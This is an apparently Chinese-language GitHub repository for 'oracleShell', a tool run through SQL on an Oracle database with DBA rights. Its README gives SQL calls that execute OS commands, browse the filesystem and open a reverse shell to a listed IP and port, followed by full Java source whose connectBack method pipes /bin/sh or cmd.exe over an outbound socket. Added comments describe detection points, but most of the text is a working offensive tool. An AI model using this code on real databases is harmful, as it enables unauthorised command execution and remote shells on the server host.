├── README.md
├── cmd.jpg
├── filemanager.jpg
├── oracleShell.jar
└── shell.png

/README.md:
--------------------------------------------------------------------------------
1 | # oracleShell oracle 数据库命令执行
2 |
3 | ![](./cmd.jpg)
4 |
5 | ![](./filemanager.jpg)
6 |
7 | ### 测试环境-DBA权限:
8 |
9 | `SELECT * FROM v$version`
10 |
11 | ```
12 | Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
13 | PL/SQL Release 11.2.0.1.0 - Production
14 | "CORE 11.2.0.1.0 Production"
15 | TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
16 | NLSRTL Version 11.2.0.1.0 - Production
17 | ```
18 |
19 | Function
20 | =======
21 |
22 | ```
23 | 命令执行
24 | select run('exec','whoami','UTF-8') from dual;
25 | 文件管理
26 | select run('list','/usr','UTF-8') from dual;
27 | 获取当前路径
28 | select run('getCurrentDir','','UTF-8') from dual;
29 | 反弹shell
30 | select run('connectBack','172.17.0.3^8989','UTF-8') from dual;
31 |
32 | ```
33 |
34 | ![](./shell.png)
35 |
36 | Shell.java
37 | ==========
38 |
39 | ```
40 | import java.io.BufferedReader;
41 | import java.io.BufferedWriter;
42 | import java.io.File;
43 | import java.io.IOException;
44 | import java.io.InputStream;
45 | import java.io.InputStreamReader;
46 | import java.io.OutputStream;
47 | import java.io.OutputStreamWriter;
48 | import java.net.Socket;
49 | import java.util.Date;
50 |
     /**
      * Static helpers that the README calls from SQL as {@code run(method, params, encoding)}
      * (e.g. {@code select run('exec','whoami','UTF-8') from dual}): OS command execution,
      * directory listing, working-directory lookup and an outbound interactive shell.
      *
      * Everything here acts through the JVM the class is loaded into, so the processes it
      * spawns and the sockets it opens belong to that JVM's OS account -- presumably the
      * database server account, given that the README tests it with DBA rights on 11.2.0.1.
      *
      * Where to look when hunting for a class like this (general Oracle facts, not taken from
      * this page): unexpected JAVA CLASS / JAVA SOURCE objects in DBA_OBJECTS, SQL functions
      * declared LANGUAGE JAVA, and DBA_JAVA_POLICY rows granting java.io.FilePermission
      * "execute" or java.net.SocketPermission to ordinary schemas. Keeping those grants away
      * from application accounts removes the preconditions this code relies on.
      */
51 | public class Shell extends Object {
         /**
          * Single entry point: selects an operation by name (case-insensitive) and returns
          * its text result.
          *
          * Recognised names are "exec", "list", "getCurrentDir" and "connectBack"; anything
          * else yields the literal "unkown methodName". In the README's usage all three
          * arguments come straight from the SQL statement, so whoever may call the SQL
          * wrapper chooses the command, the path and the peer address.
          *
          * @param methodName operation name; not null-checked, null throws NullPointerException
          * @param params     operation argument; for connectBack it must look like "host^port"
          * @param encoding   forwarded to exec and list
          * @return the selected operation's result string
          * @throws StringIndexOutOfBoundsException for connectBack when params has no '^'
          * @throws NumberFormatException for connectBack when the port part is not an integer
          */
52 |     public static String run(String methodName, String params, String encoding) {
53 |         String result = "";
54 |         if (methodName.equalsIgnoreCase("exec")) {
55 |             result = Shell.exec(params, encoding);
56 |         } else if (methodName.equalsIgnoreCase("list")) {
57 |             result = Shell.list(params, encoding);
58 |         } else if (methodName.equalsIgnoreCase("getCurrentDir")) {
59 |             result = Shell.getCurrentDir();
60 |         } else if (methodName.equalsIgnoreCase("connectBack")) {
                 // params is split at the first '^': text before it is the host, the rest the port.
61 |             String ip = params.substring(0, params.indexOf("^"));
62 |             String port = params.substring(params.indexOf("^") + 1);
63 |             result = Shell.connectBack(ip, Integer.parseInt(port));
64 |         } else {
65 |             result = "unkown methodName";
66 |         }
67 |         return result;
68 |     }
69 |
         /**
          * Runs {@code cmd} as a child process of the current JVM and returns what it printed.
          *
          * The string goes to Runtime.exec(String), which splits it on whitespace and starts
          * the program directly; no shell interprets it. Output is collected only after
          * waitFor() returns: stdout when the exit code is 0, stderr otherwise, line by line
          * with '\n' appended.
          *
          * @param cmd      command line, passed through unchanged from the caller
          * @param encoding defaulted to "utf-8" when null or empty but never used afterwards
          * @return the captured output, with any IOException/InterruptedException message
          *         appended instead of being thrown
          */
70 |     public static String exec(String cmd, String encoding) {
71 |         String result = "";
72 |         if (encoding == null || encoding.equals("")) {
73 |             encoding = "utf-8";
74 |         }
75 |         Process p;
76 |         try {
77 |             p = Runtime.getRuntime().exec(cmd);
78 |             try {
                     // Blocks until the child exits; nothing has drained its output pipes yet.
79 |                 p.waitFor();
80 |             } catch (InterruptedException e) {
81 |                 result += e.getMessage();
82 |                 e.printStackTrace();
83 |             }
84 |             InputStream fis;
85 |             if (p.exitValue() == 0) fis = p.getInputStream();
86 |             else fis = p.getErrorStream();
                 // No charset argument: the reader uses the platform default, not 'encoding'.
87 |             InputStreamReader isr = new InputStreamReader(fis);
88 |             BufferedReader br = new BufferedReader(isr);
89 |             String line = null;
90 |             while ((line = br.readLine()) != null) {
91 |                 result += line + "\n";
92 |             }
93 |         } catch (IOException e) {
94 |             result += e.getMessage();
95 |         }
96 |         return result;
97 |     }
98 |
         /**
          * Lists the entries of directory {@code path}, one per line: modification date, a
          * type column, a size column and the file name.
          *
          * File.listFiles() returns null when path is not a readable directory, so the loop
          * below throws NullPointerException in that case; nothing here catches it.
          * NOTE(review): the type literals and the directory size literal are empty/space
          * strings in this listing -- possibly markup lost when the page was extracted;
          * confirm against the original source.
          *
          * @param path     directory to enumerate, supplied by the caller
          * @param encoding defaulted to "utf-8" when null or empty but otherwise unused
          * @return the formatted listing ("" for an empty directory)
          */
99 |     public static String list(String path, String encoding) {
100 |         String result = "";
101 |         if (encoding == null || encoding.equals("")) {
102 |             encoding = "utf-8";
103 |         }
104 |         File file = new File(path);
105 |         File[] items = file.listFiles();
106 |         for (int i = 0; i < items.length; i++) {
107 |             File item = items[i];
108 |             String type = item.isDirectory() ? "" : " ";
109 |             String size = item.isDirectory() ? " " : item.length() / 1024 + "KB";
                  // Sizes are whole KB; a file under 1 KB is reported in bytes instead.
110 |             if (size.equals("0KB")) size = item.length() + "Byte";
                  // Date.toLocaleString() is deprecated and formats in the JVM's default locale.
111 |             String date = new Date(item.lastModified()).toLocaleString();
112 |             result += date + " " + type + " " + size + " " + item.getName() + "\n";
113 |         }
114 |         return result;
115 |     }
116 |
          /**
           * Returns the absolute form of the empty path, which Java resolves against the
           * JVM's current working directory.
           *
           * @return the directory path, or "" if getAbsolutePath() throws (the exception is
           *         discarded)
           */
117 |     public static String getCurrentDir() {
118 |         String result = "";
119 |         File directory = new File("");
120 |         try {
121 |             result = directory.getAbsolutePath();
122 |         } catch (Exception e) {
123 |         }
124 |         return result;
125 |     }
126 |
          /**
           * Opens a TCP connection from this host to {@code ip:port} and attaches an OS shell
           * to it.
           *
           * /bin/sh is started unless os.name contains "windows", in which case cmd.exe is
           * used. Two StreamConnector threads then copy shell stdout to the socket and socket
           * input to shell stdin; the shell's stderr is never read, and neither the socket
           * nor the process is closed by this method.
           *
           * Seen from the defending side, the JVM's host process gains a shell child process
           * and a long-lived outbound connection to a caller-chosen address. Parent/child
           * process telemetry on the database host and egress filtering for database servers
           * are the controls that surface or block that behaviour.
           *
           * @param ip   remote host to connect to
           * @param port remote TCP port
           * @return always "^OK^": every exception is swallowed, so the value says nothing
           *         about whether the connection or the shell actually started
           */
127 |     public static String connectBack(String ip, int port) {
              /** Copies characters from one stream to another on its own thread. */
128 |         class StreamConnector extends Thread {
129 |             InputStream sp;
130 |             OutputStream gh;
131 |
132 |             StreamConnector(InputStream sp, OutputStream gh) {
133 |                 this.sp = sp;
134 |                 this.gh = gh;
135 |             }
136 |
137 |             public void run() {
138 |                 BufferedReader xp = null;
139 |                 BufferedWriter ydg = null;
140 |                 try {
141 |                     xp = new BufferedReader(new InputStreamReader(this.sp));
142 |                     ydg = new BufferedWriter(new OutputStreamWriter(this.gh));
143 |                     char buffer[] = new char[8192];
144 |                     int length;
                          // Relay until read() reports end of stream; flush after every chunk.
145 |                     while ((length = xp.read(buffer, 0, buffer.length)) > 0) {
146 |                         ydg.write(buffer, 0, length);
147 |                         ydg.flush();
148 |                     }
149 |                 } catch (Exception e) {
150 |                 }
                      // Both ends are closed once the relay stops; failures are ignored.
151 |                 try {
152 |                     if (xp != null) xp.close();
153 |                     if (ydg != null) ydg.close();
154 |                 } catch (Exception e) {
155 |                 }
156 |             }
157 |         }
158 |         try {
159 |             String ShellPath;
160 |             if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
161 |                 ShellPath = new String("/bin/sh");
162 |             } else {
163 |                 ShellPath = new String("cmd.exe");
164 |             }
165 |             Socket socket = new Socket(ip, port);
166 |             Process process = Runtime.getRuntime().exec(ShellPath);
167 |             (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
168 |             (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
169 |         } catch (Exception e) {
170 |         }
171 |         return "^OK^";
172 |     }
173 | }
174 | ```
175 |
176 |
177 |
178 |
179
| ### 参考链接: 180 | 181 | rebeyond-oracleShell.jar 182 | 183 | 184 | 185 | 186 | 187 | -------------------------------------------------------------------------------- /cmd.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/oracleShell/cd5688993d84e249a03a1ec2cd90a094899333e1/cmd.jpg -------------------------------------------------------------------------------- /filemanager.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/oracleShell/cd5688993d84e249a03a1ec2cd90a094899333e1/filemanager.jpg -------------------------------------------------------------------------------- /oracleShell.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/oracleShell/cd5688993d84e249a03a1ec2cd90a094899333e1/oracleShell.jar -------------------------------------------------------------------------------- /shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/oracleShell/cd5688993d84e249a03a1ec2cd90a094899333e1/shell.png --------------------------------------------------------------------------------